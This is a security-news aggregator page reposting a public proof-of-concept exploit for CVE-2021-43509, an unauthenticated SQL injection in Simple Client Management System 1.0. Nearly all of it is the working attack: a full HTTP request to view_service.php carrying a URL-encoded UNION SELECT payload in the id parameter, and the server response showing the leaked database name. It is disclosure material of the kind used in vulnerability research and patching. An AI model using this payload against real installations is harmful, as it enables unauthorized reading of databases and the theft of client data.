Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.

CVE
#sql#vulnerability#web#windows#apple#debian#apache

Permalink

Cannot retrieve contributors at this time

# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view_service.php)

# Date: 27/01/2022

# Exploit Author: Rahul Kalnarayan (r4hn1)

# Vendor Homepage: https://www.sourcecodester.com/

# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

# Version: 1.0

# Category: Webapps

# Tested on: Apache2+MariaDB latest version

# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to dump databse.

Vulnerable Page: /cms/admin/maintenance/view_service.php

POC-Request

-----------------------------------

GET /cms/admin/maintenance/view_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null–+ HTTP/1.1

Host: 192.168.1.76

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:34:55 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1469

Connection: close

Content-Type: text/html; charset=UTF-8

<style>

#uni_modal .modal-footer{

display:none;

}

</style>

<div class="container-fluid" id="print_out">

<div id=’transaction-printable-details’ class=’position-relative’>

<div class="row">

<fieldset class="w-100">

<div class="col-12">

<dl>

<dt class="text-info">Name:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Description:</dt>

<dd class="pl-3">cms_db</dd>

<dt class="text-info">Price:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Status:</dt>

<dd class="pl-3">

<span class="badge badge-danger rounded-pill">Inactive</span>

</dd>

</dl>

</div>

</fieldset>

</div>

</div>

</div>

<div class="form-group">

<div class="col-12">

<div class="d-flex justify-content-end align-items-center">

<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>

</div>

</div>

</div>

<script>

$(function(){

$(‘.table td,.table th’).addClass(‘py-1 px-2 align-middle’)

})

</script>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907